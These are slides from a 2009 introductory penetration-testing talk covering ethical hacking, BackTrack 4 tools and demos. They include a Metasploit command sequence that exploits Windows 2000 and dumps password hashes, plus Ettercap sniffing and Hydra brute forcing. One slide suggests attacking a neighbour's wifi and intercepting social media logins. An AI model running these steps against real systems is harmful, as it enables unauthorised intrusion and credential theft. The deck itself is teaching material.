1. Hack Attack!
An Introduction to Penetration Testing
Steve Phillips (aka fraktil)
2009.12.17 @ SBLUG

2. Who Am I?
● Attended UCSB 2004-2008
– Majored in Math and Philosophy, not CS
● Started using Linux in 2001
– Mandrake, then Slackware, then Debian
● Applying for penetration testing job in January
● Biases/“Preferences”
– Linux > Windoze (duh)
– Python > Ruby
– Emacs > vi
– Debian (and variants) > others

3. Can Hacking Be Ethical?
Or, what is Ethical Hacking?
● Black Hat
– Compromises computer systems without permission
– Criminal
● White Hat, aka Ethical Hacker
– Gets paid to hack – legally (friggin' sweet)
– Always gets permission before attacking a system
● Gray Hat
– Some combination of Black and White

4. The Stages of Hackerdom
● Script Kiddie (“skiddie”)
– Can only run automated tools
– Doesn't understand underlying technology
● Advanced Beginner
– Mastered advanced features of many tools
– Knows enough programming to create own tools
● C => Python, Ruby (see next slide)
● Uberhacker
– Discovers new vulnerabilities (or new types of vulns)
– Knows Assembly, C, Python and/or Ruby, SQL
– Excellent programmer; writes tools, scripts regularly
– Can defend as well as attack (firewalls, IDS, etc)

5. Programming Languages Used to
Create Hacking Tools
● C
– Nmap (network mapper, portscanner, more)
– Nessus (vulnerability detection)
– Wireshark (network sniffer)
● Python
– w3af (web app attack framework)
– sqlmap (automatic SQL injection)
– TheMiddler (session hijacking, targeted pw sniffing)
● Ruby
– Metasploit (vuln exploitation, much more)

6. What About in Back|Track 4?
Overall: Tools + Exploits
● File count: find /pentest | grep .c$ | wc -l
● Line count: cat $(find /pentest | grep .c$) | wc -l
● C: 4058 .c files 1,300,000 lines
● Python: 2431 .py files 612,000 lines
● Ruby: 5468 .rb files 694,000 lines
● 2773 files from Metasploit
● 1271 files from Dradis (information organizing, sharing)
● 1424 other
● C++: 431 .cpp files 144,000 lines

7. What About in Back|Track 4?
Exploits Only (from exploitdb)
● C
– 1321 .c files
● Python
– 405 .py files
● Ruby
– 146 .rb files
● C++
– 110 .cpp files

8. TIOBE Index
Programming Language Popularity

9. Back|Track 4 Categories
● Information Gathering
– Email addresses, DNS
● Network Mapping
● Vulnerability Identification
● Web Application Analysis
● Radio Network Analysis
● Penetration (not that kind)

10. Back|Track 4 Categories
● Privilege Escalation
● Maintaining Access
● Digital Forensics
● Reverse Engineering
● VoIP (Voice over Internet Protocol)
● Misc

11. DEMO: Sniffing Passwords
with Ettercap
● ARP Poisoning for MitM Attack
– Associate attacker's MAC with router's IP
– Target tries to route traffic through router
● Routes it through attacker instead
– Attacker forwards traffic both ways
– Attacker can silently watch or inject traffic
● TheMiddler, sslstrip

12. How Else Can We Get Creds?
● Phishing
– Via email
● Spear Phishing
– Becoming popular
– Very hard to stop
● In-person Social Engineering
– Kevin Mitnick is famous for this
● Brute force

13. DEMO: Bruteforcing FTP
● Using Hydra to bruteforce weak FTP password
– Well, really a dictionary attack

14. DEMO: Pwning Win2k
● Create database (or connect to existing)
– db_create [optional_database_name]
● Find win2k box using nmap (in metasploit)
– db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24
● Search Metasploit for win2k exploits
– search 2000
● Use exploit w/meterpreter
– use exploit/windows/smb/ms05_039_pnp
– set PAYLOAD windows/meterpreter/bind_tcp
● Which parameters still need to be set?
– show options

15. DEMO: Pwning Win2k
● Set parameters
– set RHOST [target_ip]
● Now we exploit! Can you guess the command?
– exploit
● Get hashes
– hashdump
– This would be much harder without meterpreter!
● Copy and paste hashes into new text file
● Crack hashes with john the ripper
– ./john [file_containing_hashes].txt
● Game Over

16. Why Become an Ethical Hacker?
● Field is growing (see next slide)
– New laws, regulations
– US government falling behind in cyber security
● You get paid to hack – need I say more?
– Banks
– Telecoms
– Casinos
– Foreign countries (for the federal gov't)

18. How Can I Practice Legally?
● Virtualization (VMware, VirtualBox)
– Use virtual images from recent CTF competitions
● http://lampsecurity.org/capture-the-flag-6
● http://ctf.hcesperer.org/25c3ctf
● http://ctf.hcesperer.org/daopen08
● http://ctf.hcesperer.org/eh08ctf
● NetWars
– Part of government's Cyber Defense Initiative 2009
● DVL: Damn Vulnerable Linux
– Purposely misconfigured, exploitable
– http://tinyurl.com/dvllinux15

19. Further Resources
Learning
● Metasploit
– Online Class: http://www.offensive-
security.com/metasploit-unleashed/
● Nmap Guide
– http://nmap.org/book/man.html
● Security Videos, Tutorials
– http://securitytube.net

20. Tools Added to Back|Track
Extra Tools I Used
● Metasploit 3.3.2 (updated)
● Nmap 5.0 (updated)
● Exploitdb archive (/pentest/exploits/exlpoitdb)

21. Summary
● Hacking can be ethical
● “Computer security” is an oxymoron
– No one is safe
● REALLY powerful hacking tools exist
● Metasploit is effing dangerous

22. Future Demos?
● More local fun
– Crack neighbor's wifi (WEP)
– Exploit remote vuln in DD-WRT firmware
– Redirecting traffic using fake DNS server
– Intercepting Twitter, Facebook, LinkedIn creds
● More like real pen testing
– SQL injection
– XSS
– Nessus scan

23. Contact Information
● Name: Steve Phillips
● New Blog: SweetHack.blogspot.com
● Email: fraktil@gmail.com
● Twitter: twitter.com/fraktil
● LinkedIn: linkedin.com/in/sdphillips
● IRC: fraktil in #sblug on borg-cube.com

24. Questions?